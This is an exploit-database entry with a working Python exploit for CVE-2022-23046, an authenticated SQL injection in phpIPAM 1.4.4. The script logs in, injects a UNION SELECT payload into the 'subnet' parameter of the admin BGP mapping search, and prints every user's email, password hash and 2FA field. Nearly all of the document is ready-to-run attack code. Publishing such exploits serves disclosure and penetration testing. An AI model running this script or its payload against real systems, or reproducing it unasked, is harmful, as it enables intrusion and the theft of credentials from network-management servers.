PHPIPAM 1.4.4 - SQLi (Authenticated)

EDB-ID:

50684






# Exploit Title: PHPIPAM 1.4.4 - SQLi (Authenticated)
# Google Dork: N/A
# Date: 20/01/2022
# Exploit Author: Rodolfo "Inc0gbyt3" Tavares
# Vendor Homepage: https://github.com/phpipam/phpipam
# Software Link: https://github.com/phpipam/phpipam
# Version: 1.4.4
# Tested on: Linux/Windows
# CVE : CVE-2022-23046

import argparse
import getpass
import sys

import requests

################
"""
Author of exploit: Rodolfo 'Inc0gbyt3' Tavares
CVE: CVE-2022-23046
Type: SQL Injection (authenticated; the injection point is the `subnet` POST parameter of /app/admin/routing/edit-bgp-mapping-search.php, which lives under the admin area, so a sufficiently privileged account is expected)

Usage:

$ python3 -m pip install requests
$ python3 exploit.py -u http://localhost:8082 -U <admin> -P <password>
"""
###############

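__author__ = "Inc0gbyt3"

# Command-line interface.  The parsed values feed the module-level globals
# that get_token() and exploit_sqli() read, so they are resolved at import time.
# All arguments the exploit cannot run without are `required`, which makes
# argparse print usage and exit(2) by itself; the previous `len(sys.argv) < 3`
# check only printed help and then carried on with `None` values.
menu = argparse.ArgumentParser(
    description="[+] Exploit for PHPIPAM Version: 1.4.4 Authenticated SQL Injection\n CVE-2022-23046"
)
menu.add_argument(
    "-u", "--url",
    help="[+] URL of target, example: https://phpipam.target.com",
    type=str, required=True,
)
menu.add_argument("-U", "--user", help="[+] Username", type=str, required=True)
menu.add_argument(
    "-P", "--password",
    help="[+] Password (omit it to be prompted, so it does not end up in shell history or `ps`)",
    type=str,
)
args = menu.parse_args()

# A trailing slash would otherwise yield "https://host//app/..." request paths.
target = args.url.rstrip("/")
user = args.user
# A password given on the command line is visible to every local user through
# the process list and is recorded in shell history; prefer the interactive prompt.
password = args.password if args.password is not None else getpass.getpass("[+] Password: ")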


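def get_token():
    """Log in to phpIPAM and return the session cookie as a ``Cookie`` header value.

    Posts the ``-U``/``-P`` credentials to ``/app/login/login_check.php`` and
    collects every cookie the server set (including on any redirect hop) from
    the session's cookie jar.  The previous implementation string-split the
    joined ``Set-Cookie`` header on ``;`` and ``,`` and could hand back a
    fragment such as ``HttpOnly, phpipam=...`` as the cookie.

    Returns:
        ``"name=value; name2=value2"`` built from the cookies received, or
        ``None`` when the login produced no cookie at all (wrong URL, bad
        credentials, network/TLS failure).  A diagnostic is printed in that case.
    """
    login_url = f"{target}/app/login/login_check.php"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    }
    credentials = {"ipamusername": user, "ipampassword": password}

    try:
        with requests.Session() as session:
            # verify=False: certificate validation is disabled on purpose for lab
            # targets with self-signed certs.  It also means the credentials can
            # be intercepted by anyone on the path, so only use it where authorised.
            r = session.post(login_url, verify=False, timeout=10, headers=headers, data=credentials)
            cookies = session.cookies.get_dict()
    except requests.RequestException as e:
        print(f"[-] Login request failed: {e}")
        return None

    if not cookies:
        print(f"[-] No session cookie returned (HTTP {r.status_code}); check the URL and credentials")
        return None
    if "phpipam" not in cookies:
        # The session cookie seen during development was named "phpipam"; a
        # different name is not necessarily fatal, so send what the server set.
        print("[!] No 'phpipam' cookie in the response; sending the cookies received anyway")

    return "; ".join(f"{name}={value}" for name, value in cookies.items())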


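def exploit_sqli():
    """Run the authenticated SQL injection and print the dumped ``users`` rows.

    Logs in through get_token(), then POSTs the injected ``subnet`` value to
    ``/app/admin/routing/edit-bgp-mapping-search.php``.  On success the
    response body, which carries the ``email:password_hash:2fa`` rows the
    payload concatenates, is printed verbatim.

    Exits with status 1 when no session cookie could be obtained.  Previously a
    ``None`` cookie was passed on; ``requests`` drops header entries whose value
    is ``None``, so the request went out unauthenticated and the failure was
    silent.
    """
    cookie = get_token()
    if not cookie:
        print("[-] Could not obtain a session cookie; aborting")
        sys.exit(1)

    search_url = f"{target}/app/admin/routing/edit-bgp-mapping-search.php"

    # The `subnet` value closes the double-quoted string in the backend query
    # and appends a UNION SELECT whose first column is one string built with a
    # user variable (@): every row of `users` is folded into
    # "email:password_hash:2fa", so a single response carries the whole table.
    # 0x3a is ':' in MySQL.  The last separator used to be the quoted string
    # "0x3a", which emitted the literal text 0x3a instead of a colon.
    payload = (
        'pwn"union select(select concat(@:=0x3a,(select+count(*) from(users)'
        'where(@:=concat(@,email,0x3a,password,0x3a,2fa))),@)),2,3,user() -- -'
    )
    data = {"subnet": payload, "bgp_id": 1}

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Cookie": cookie,
    }

    try:
        # verify=False is deliberate for self-signed lab targets; it also makes
        # the session cookie interceptable, so only use it where authorised.
        r = requests.post(search_url, verify=False, timeout=10, headers=headers, data=data)
    except requests.RequestException as e:
        print(f"[-] {e}")
        return

    # "rounds" presumably matches crypt-style "$6$rounds=..." password hashes
    # and "admin" the default account name; either one in the body indicates
    # the UNION result came back.  Report the negative case too instead of
    # exiting silently.
    if "admin" in r.text or "rounds" in r.text:
        print("[+] Vulnerable..\n\n")
        print(f"> Users and hash passwords: \n\n{r.text}")
        print("\n\n> DONE <")
    else:
        print(
            f"[-] No user data in the response (HTTP {r.status_code}); "
            "the target may be patched or the account may lack access to /app/admin/"
        )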



if __name__ == "__main__":
    # Script entry point: authenticate with the supplied credentials and fire the SQLi.
    exploit_sqli()